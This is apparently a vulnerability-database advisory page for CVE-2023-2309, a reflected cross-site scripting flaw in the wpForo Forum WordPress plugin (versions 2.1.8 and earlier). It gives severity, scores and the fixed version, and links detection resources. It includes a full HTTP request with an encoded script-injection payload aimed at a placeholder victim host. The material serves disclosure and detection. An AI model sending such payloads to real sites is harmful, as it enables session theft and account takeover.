🔙 목록으로 돌아가기

CVE-2023-2309: wpForo Forum <= 2.1.8 - Cross-Site Scripting

TitlewpForo Forum <= 2.1.8 - Cross-Site Scripting
Authors4e-io
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript through the wpforo_debug function to steal WordPress administrator session cookies when they view crafted links.
RemediationFixed in 2.1.9
CVSS Score6.1
EPSS Score0.11967
CVE IDCVE-2023-2309
Tags cve cve2023 wordpress wpforo wpscan wp-plugin wp xss vuln

🔍 Vulnerability Description

The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

🌐 HTTP Request

GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2309.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-2309.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A